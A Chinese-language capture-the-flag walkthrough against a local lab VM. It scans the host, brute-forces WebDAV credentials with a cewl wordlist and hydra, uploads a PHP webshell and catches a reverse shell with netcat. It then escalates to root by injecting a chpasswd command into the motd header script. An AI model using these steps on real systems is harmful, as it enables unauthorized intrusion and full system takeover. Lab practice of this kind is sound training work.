arp-scan -l
探测存活主机
多出来的是192.168.37.164 就是我们的目标靶机
nmap探测一下
nmap -Pn -sV -n -A 192.168.37.164
-sV (版本探测) 打开版本探测。
-Pn和-P0都是跳过ping的步骤
-n (不用域名解析) 告诉Nmap 永不对它发现的活动IP地址进行反向域名解析 既然DNS一般比较慢,这可以让事情更快些
-A同时打开操作系统探测和版本探测
80和22端口开着
我们去80端口看看 能不能发什么 来连22
一堆乱七八糟的图片哈 没啥思路
nikto扫目录没什么结果
dirb倒是扫出了一个webdav webdav有搞头
cadaver 目标 来远程登录不知道用户名和密码
我把这网站下面那堆文字翻译了一下 康康有没有用户名和密码的线索
我看不懂哈 这里可以用cewl 192.168.37.164 -w /root/1.txt
爬取下来 字典 毕竟这么多单词呢
hydra -L 1.txt -P 1.txt 192.168.37.164 http-get /webdav
-L 用户名文件 指定用户名字典
-P 密码文件 指定密码字典
后面是协议和地址 我发现只有get可以 这个场景下用post是不行的
我抓包发现确实是get的包 因此也更理解了一点
最后爆出结果
yamdoot Swarg
cadaver http://192.168.37.164/webdav
之前这个cadaver就可以连上目标了
可以上传php马
上传后本地监听木马的端口 反弹shell
本地监听
nc -lvvp 6789
进行加载
成功拿到低权限shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
切换到合适的交互shell
翻一番home目录翻到第一个flag
在mnt目录下翻到可疑脚本 打开后显示奇怪的东西
brainfuck在线解码得这个
https://www.splitbrain.org/services/ook
chitragupt
猜测是某个账号的密码 确实可以用ssh连其中一个
ssh inferno@192.168.37.164
chitragupt
得到了正常的shell
提权
echo "echo 'root:inferno'|sudo chpasswd" >> /etc/update-motd.d/00-header
结束
总结一下qwq
信息收集到端口 80 22
通过80爆目录有webdav
使用cewl生成社工字典然后hydra爆破拿低权限shell
拿到shell后 发现另一个账户的密码 ssh连
提权
————————————————
修改00-header文件 (它在/etc/update-motd.d目录
加入修改root密码的脚本 echo “echo ‘root:inferno’ | sudo chpasswd” >> 00-header:
重新连ssh即可su root切换root用户
——————————————————————————————————————